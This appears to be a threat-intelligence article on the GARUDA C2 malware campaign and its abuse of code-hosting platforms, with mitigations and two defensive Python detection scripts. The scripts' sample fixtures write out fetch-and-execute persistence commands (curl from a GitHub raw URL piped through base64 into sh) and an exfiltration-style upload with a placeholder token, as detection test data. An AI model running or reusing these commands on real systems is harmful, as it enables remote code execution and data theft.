This article provides an overview of Kroll’s investigation of the GARUDA C2 malware. Stay tuned for our upcoming white paper which will provide a deep dive into the malware’s architecture; command and control tradecraft; observed threat actor tactics, techniques and procedures; and actionable detection and mitigation guidance.
Kroll Threat Intelligence (TI) has identified a cross-platform malware campaign leveraging public code-hosting platforms, most notably GitHub, to stage tooling and manage ongoing operations. The actor rotated between multiple accounts before ultimately removing the repository; however, Kroll preserved the tooling prior to deletion. Analysis indicates a single operator using a standardized, multi-operating system (OS) toolchain capable of targeting Windows, macOS, and Linux environments, highlighting a scalable and repeatable operational model. This framework is being tracked internally by Kroll TI as GARUDA C2.
Exposed development artifacts, such as build logs, embedded Hindi-language comments and infrastructure indicators, allow Kroll to attribute this activity with high confidence to an India-based actor. The tooling also suggests the likely use of a locally hosted LLM to accelerate malware development. The actor maintains redundancy across multiple code-hosting services to deliver payloads, exfiltrate data and distribute updated commands, reinforcing a broader trend of adversaries abusing legitimate cloud platforms for resilience and stealth.
GARUDA C2 Details
GARUDA C2 employs a consistent multistage architecture across operating systems. Initial downloaders retrieve secondary components that conduct host reconnaissance, exfiltrate the collected data to the code-hosting service using hard-coded application programming interface (API) tokens, and periodically poll a simple version indicator in the repository; when the indicator changes, the implant retrieves updated tasking delivered as Base64-encoded commands, which it decodes and executes locally. Persistence is implemented using native OS features, including registry Run keys and scheduled tasks on Windows, LaunchAgents on macOS, and systemd services on Linux.
More advanced payloads incorporate Rust-based binaries and Windows Dynamic Link Library (DLL) sideloading techniques (specifically leveraging VLC libraries) to execute and persist while deploying local command-execution frameworks and presenting decoy content to victims.
Overall, this campaign reflects a capable actor employing cross-platform malware, cloud-native infrastructure and automation-friendly tooling to sustain access and adapt operations efficiently.
Organizations should treat this activity as indicative of a broader shift toward low-cost, multi-platform malware operations. They must ensure detection and response strategies account for abuse of trusted services and native persistence mechanisms.
Observed MITRE ATT&CK Techniques
The following chart shows observed MITRE ATT&CK techniques for this malware:

Recommended Mitigation Strategies
Harden Endpoint Persistence Controls
- Monitor and alert on common persistence mechanisms:
  - Windows: registry Run keys and newly created or modified scheduled tasks (especially those masquerading as system updates)
  - macOS: unauthorized LaunchAgents and custom plist files in user directories
  - Linux: new or modified systemd services running under nonstandard users
- Enforce least privilege and restrict system-level persistence creation to approved administrative processes only
- Disable or restrict PowerShell and Windows Script Host (WSH) (wscript.exe, cscript.exe) on endpoints that do not need them; where PowerShell must remain, enable script block logging so decoded commands are recorded
- Verify that DLL safe search mode (the SafeDllSearchMode value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager) has not been disabled; it is on by default and moves the current directory later in the DLL search order. Note that it does not cover a DLL dropped next to a copied legitimate executable, which is the usual sideloading layout, so pair it with application control
- Enable attack surface reduction (ASR) rules, in particular those that block JavaScript or VBScript from launching downloaded executable content and block execution of potentially obfuscated scripts
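To make the three monitoring items above concrete, the following triage script is an added example; it is not Kroll's tooling, and the heuristics, allow-list of expected service users and sample artifacts are this example's own constructions rather than GARUDA C2 indicators. It parses a systemd unit, a LaunchAgent plist and Windows Run-key values with the standard library and scores each against the behaviours described in this article: nonstandard service users, script hosts and downloaders in autostart commands, Base64 decoding at start-up, fetches from code-hosting domains, execution from user-writable paths, and system-component name masquerading.

```python
"""Persistence-artifact triage (added example; heuristics are the example's own)."""
import plistlib
import re
from configparser import ConfigParser

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe",
                "osascript", "bash", "sh", "zsh", "python3"}
DOWNLOADERS = {"curl", "wget", "certutil.exe", "bitsadmin.exe", "invoke-webrequest"}
CODE_HOSTS = ("github.com", "githubusercontent.com", "gitlab.com", "codeberg.org", "bitbucket.org")
USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/users/",
                 "\\appdata\\", "\\temp\\", "\\users\\public\\")
EXPECTED_SERVICE_USERS = {"root"}  # assumption: accounts allowed to own system units here


def command_findings(cmd: str) -> list[str]:
    """Heuristics shared by all three OS artifact types."""
    tokens = re.split(r"[\s\"']+", cmd)
    basenames = {t.rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower() for t in tokens}
    lowered = cmd.lower()
    out = []
    if basenames & SCRIPT_HOSTS:
        out.append("script host in autostart command")
    if basenames & DOWNLOADERS:
        out.append("downloader in autostart command")
    if any(h in lowered for h in CODE_HOSTS):
        out.append("fetches from public code-hosting service")
    if re.search(r"base64\s+(-d|--decode)\b|-enc(odedcommand)?\s", cmd, re.I):
        out.append("Base64-decoded payload at start-up")
    if any(p in lowered for p in USER_WRITABLE):
        out.append("executes from user-writable path")
    return out


def audit_systemd_unit(unit_text: str) -> list[str]:
    cp = ConfigParser(strict=False, interpolation=None)
    cp.optionxform = str  # unit keys are case-sensitive (ExecStart, User)
    cp.read_string(unit_text)
    svc = cp["Service"] if cp.has_section("Service") else {}
    findings = []
    user = svc.get("User", "root")
    if user not in EXPECTED_SERVICE_USERS:
        findings.append(f"service runs as nonstandard user {user!r}")
    return findings + command_findings(svc.get("ExecStart", ""))


def audit_launch_agent(plist_bytes: bytes, path: str) -> list[str]:
    plist = plistlib.loads(plist_bytes)
    findings = []
    label = plist.get("Label", "")
    # Apple's own agents ship under /System/Library; a com.apple.* label in a
    # user's ~/Library/LaunchAgents is a masquerading name.
    if label.startswith("com.apple.") and path.startswith("/Users/"):
        findings.append(f"com.apple.* label in user LaunchAgent ({label})")
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    findings += command_findings(" ".join(args))
    if plist.get("StartInterval"):
        findings.append(f"re-runs every {plist['StartInterval']}s (poll-style)")
    return findings


def audit_run_value(value_name: str, command: str) -> list[str]:
    findings = command_findings(command)
    if findings and re.search(r"update|security|defender|windows", value_name, re.I):
        findings.append(f"value name {value_name!r} masquerades as a system component")
    return findings


def is_suspicious(findings: list[str]) -> bool:
    # One weak signal (a legitimate per-user app under AppData, say) is not enough on its own.
    return len(findings) >= 2


# Constructed artifacts for this example; not GARUDA C2 indicators.
SYSTEMD_UNIT = """\
[Unit]
Description=System Update Helper
[Service]
User=www-data
ExecStart=/bin/bash -c "curl -fsSL https://raw.githubusercontent.com/example/repo/main/version.txt | base64 -d | sh"
Restart=always
[Install]
WantedBy=multi-user.target
"""
LAUNCH_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.softwareupdate.helper</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
<string>curl -s https://raw.githubusercontent.com/example/repo/main/version.txt | base64 -D | sh</string></array>
<key>RunAtLoad</key><true/><key>StartInterval</key><integer>300</integer>
</dict></plist>"""
RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("WindowsUpdate", r'wscript.exe //B "C:\Users\alice\AppData\Roaming\update.vbs"'),
]


def triage() -> dict[str, list[str]]:
    results = {
        "systemd:update-helper.service": audit_systemd_unit(SYSTEMD_UNIT),
        "launchagent:com.apple.softwareupdate.helper":
            audit_launch_agent(LAUNCH_AGENT, "/Users/alice/Library/LaunchAgents/helper.plist"),
    }
    for name, cmd in RUN_VALUES:
        results[f"runkey:{name}"] = audit_run_value(name, cmd)
    return results


if __name__ == "__main__":
    for artifact, findings in triage().items():
        print(("ALERT " if is_suspicious(findings) else "info  ") + artifact, findings)
```

The two-finding threshold in is_suspicious is the point of the exercise: the user-writable-path check alone fires on plenty of legitimate per-user software (the constructed OneDrive entry above), so it is a score contributor, not an alert by itself. Feeding real artifacts in means reading ~/Library/LaunchAgents, /etc/systemd/system and the HKCU/HKLM Run keys from your EDR or a collection script; the parsers take the raw file content as-is.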
Restrict Abuse of Public Code-Hosting Platforms
- Implement network and endpoint controls to inspect and log access to public repositories (GitHub, GitLab, Codeberg, Gitea, Bitbucket) from endpoints that do not require development access
- Apply application allow-listing for developer tools and repositories in non-engineering environments
- Monitor for API token usage embedded in scripts or binaries communicating directly with code-hosting services
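As an added example of the last item (not Kroll's tooling; the sample script, sample binary and placeholder tokens are constructed for this illustration), the scanner below looks through raw file bytes for the publicly documented prefixes of GitHub tokens (ghp_, gho_, ghu_, ghs_, ghr_ and github_pat_) and GitLab personal access tokens (glpat-), for code-hosting API endpoints, and for the authorization headers those APIs expect, then grades the artifact: a credential and a code-hosting API in the same file is the direct-to-cloud profile this article describes.

```python
"""Scan scripts and binaries for embedded code-hosting API tokens (added example)."""
import re

# Token shapes from the providers' public documentation. Other hosts (Codeberg, Gitea)
# issue unprefixed hex tokens that cannot be matched this cheaply.
TOKEN_PATTERNS = {
    "github_token": re.compile(rb"gh[pousr]_[A-Za-z0-9]{36}"),
    "github_fine_grained_pat": re.compile(rb"github_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}"),
    "gitlab_pat": re.compile(rb"glpat-[A-Za-z0-9_-]{20}"),
}
API_ENDPOINT = re.compile(rb"(api\.github\.com|uploads\.github\.com|raw\.githubusercontent\.com"
                          rb"|gitlab\.com/api/v4|codeberg\.org/api/v1|api\.bitbucket\.org)")
# GitHub uses "Authorization: token|Bearer ..."; GitLab uses a PRIVATE-TOKEN header.
AUTH_HEADER = re.compile(rb"(Authorization[\"']?\s*:\s*[\"']?(token|Bearer)\b|PRIVATE-TOKEN)", re.I)


def redact(token: bytes) -> str:
    """Keep the prefix and a few characters to pivot on without logging a usable secret."""
    return token[:10].decode() + "..."


def scan(blob: bytes, name: str) -> list[dict]:
    """Return every token, endpoint and auth-header hit in the file, ordered by offset."""
    hits = []
    for kind, pat in TOKEN_PATTERNS.items():
        for m in pat.finditer(blob):
            hits.append({"file": name, "kind": kind, "offset": m.start(), "value": redact(m.group(0))})
    for m in API_ENDPOINT.finditer(blob):
        hits.append({"file": name, "kind": "api_endpoint", "offset": m.start(),
                     "value": m.group(0).decode()})
    for m in AUTH_HEADER.finditer(blob):
        hits.append({"file": name, "kind": "auth_header", "offset": m.start(),
                     "value": m.group(0).decode(errors="replace")})
    return sorted(hits, key=lambda h: h["offset"])


def verdict(hits: list[dict]) -> str:
    kinds = {h["kind"] for h in hits}
    has_token = any(k.endswith("token") or k.endswith("pat") for k in kinds)
    if has_token and "api_endpoint" in kinds:
        return "high"    # credential plus code-hosting API in one artifact
    if has_token or "auth_header" in kinds:
        return "medium"
    return "low"


# Constructed samples: the tokens have the documented shape but are placeholders, not live credentials.
SCRIPT = (b"import requests\n"
          b'TOKEN = "ghp_0123456789abcdefghijklmnopqrstuvwxyz"\n'
          b'H = {"Authorization": "token " + TOKEN}\n'
          b'requests.put("https://api.github.com/repos/example/repo/contents/host.txt", headers=H, json=body)\n')
BINARY = (b"\x7fELF\x02\x01\x01" + bytes(range(256)) * 2
          + b"glpat-abcdefghijklmnopqrst\x00"
          + b"https://gitlab.com/api/v4/projects/1/repository/files/\x00PRIVATE-TOKEN\x00" + bytes(64))
CLEAN = b"#!/bin/sh\necho hello\n"


def report(samples=((SCRIPT, "update.py"), (BINARY, "helper"), (CLEAN, "run.sh"))) -> dict[str, str]:
    return {name: verdict(scan(blob, name)) for blob, name in samples}


if __name__ == "__main__":
    for blob, name in ((SCRIPT, "update.py"), (BINARY, "helper"), (CLEAN, "run.sh")):
        hits = scan(blob, name)
        print(name, verdict(hits), [(h["kind"], h["offset"], h["value"]) for h in hits])
```

Because the patterns key on vendor prefixes rather than on generic high-entropy strings, they are cheap enough to run over every script directory and dropped binary on non-developer hosts, and they rarely fire on hashes or GUIDs. Treat any hit on a non-engineering endpoint as a lead: the token itself tells you which account to ask the provider to revoke and which repository to preserve before the actor deletes it.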
Detect Living-Off-the-Cloud Command and Control
- Identify abnormal patterns where endpoints:
  - Periodically poll repositories for version checks or lightweight text files
  - Retrieve Base64-encoded instructions followed by local execution
- Tune endpoint detection and response (EDR)/extended detection and response (XDR) detections for script-driven execution chains and for update-style download-and-execute behavior that does not originate from approved patch-management tooling
- Enforce egress filtering where possible, so that non-developer segments reach code-hosting services only through a logging proxy, if at all
Behavior Detection
- Identify script-to-native execution chains
- Flag repeated host-inventory collection (system, user and network enumeration) followed shortly by outbound uploads
Conclusion
LLMs have fundamentally altered the malware development landscape by enabling low-skill actors to implement advanced techniques, such as cross-platform payloads, with minimal investment. The result is a sharp increase in both malware volume and operational sophistication. In this environment, traditional analyst-centric workflows cannot scale, making LLM-assisted defensive analytics a practical requirement for modern blue teams seeking to maintain parity with increasingly automated adversaries.